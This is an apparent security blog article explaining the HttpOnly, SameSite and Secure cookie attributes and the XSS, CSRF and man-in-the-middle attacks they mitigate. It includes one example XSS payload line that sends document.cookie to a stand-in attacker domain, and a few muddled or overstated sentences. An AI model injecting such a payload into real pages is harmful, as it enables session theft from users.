Cookies Attributes

Cookies Attributes – Secure, HttpOnly, SameSite | CyberNcrypt

ByCyberNcrypt

Cookies are the most common method for providing websites with temporary persistence. They are utilized in the majority of websites, and we are familiar with their consent banners. HTTP Cookies may contain vital and confidential information; their use began around 1994; some significant legacy issues were left unaddressed, and new state-of-the-art security enhancements are currently being implemented. Some modern browsers have been addressing the Secure, HttpOnly, and SameSite cookies attributes for quite some time, and they will soon be enforced.

In this article, we’ll explain each one, why developers should care about them, and why their correct implementation adds to the security of your website.

HttpOnly Flag

The primary purpose of the HttpOnly attribute is to prevent access to cookie values via JavaScript, thereby mitigating Cross-site scripting (XSS) attacks.

Avoiding XSS may be mitigated just by sanitizing user inputs and removing tags, one small mistake can have huge consequences.

Additionally, the third-party scripts may compromise user security. Every year, we hear about the success of these attacks.

Imagine that your website stores a session cookie and contains an XSS-vulnerable input field. Then it is quite simple for an attacker to inject a script that makes an HTTP request to a URL similar to the one below.

`attackerDomain.com/cookie=${document.cookie}`

This is possible because document.cookie is accessible to all JavaScript code and displays all cookies used in the current domain. 

If you do indeed store a session, the attacker will gain access to the current session of the user.

To prevent these attacks, cookies should contain the HttpOnly flag.

The HTTPOnly attribute disallows JavaScript access to the cookie. 

Note that a cookie created with HttpOnly will continue to be sent with JavaScript fetch ().

SameSite attribute

SameSite cookies attributes provide some defense against cross-site request forgery attacks by asserting that cookies should not be sent with cross-origin requests (CSRF). CSRF is predominantly associated with third-party cookies. By “third parties,” we mean websites that we do not directly visit. SameSite allows developers to specify cookie security for each specific case.

SameSite supports three possible values: Strict, Lax, and None.

  • Lax —Default value in modern browsers. Cookies may be transmitted with top-level navigations and will be transmitted with GET requests initiated by a third-party website. The cookie is not sent on cross-site subrequests, such as calls to load images or frames, but is sent when a user navigates to the URL from an external site, for example by clicking a link.
  • Strict  — As the name suggests, the Same-Site rule is applied strictly when this option is selected. Cookies will only be sent in a first-party context and will not accompany requests from third-party websites. The browser only transmits cookies for same-site requests (that is, requests originating from the same site that set the cookie). No cookies with the SameSite=Strict attribute are sent if the request originated from a different URL than the current one.
  • None — Cookies will be sent in all contexts; cross-origin sending is permitted. The cookie is transmitted by the browser for both cross-site and same-site requests.
    None Lax is now the default value for cross-site request forgery (CSRF) protection in newer browser versions. Previously, None was the default value.

Note: Using SameSite=None necessitates the Secure attribute in the most recent versions of some browsers.

Secure attribute

A secure cookies attributes are less difficult to comprehend. A Secure cookie is only transmitted to the server with an encrypted HTTPS request. Note that insecure websites (http:) cannot use the Secure directive to set cookies. This mitigates the MITM (man-in-the-middle) attack. Websites (whose URLs begin with HTTP:) are unable to set cookies with the Secure attribute.

Conclusion

  • Don’t store sensitive data in cookies, unless required
  • Utilize the HttpOnly cookies to prevent XSS attacks.
  • SameSite cookies can be used to mitigate CSRF attacks.
  • Secure is used to prevent MITM attacks

Modern browsers currently support these attributes. Every web developer ought to be aware of and employ them. Utilizing them will improve the security of your cookies, so go ahead and use them to increase the security of your website!

Similar Posts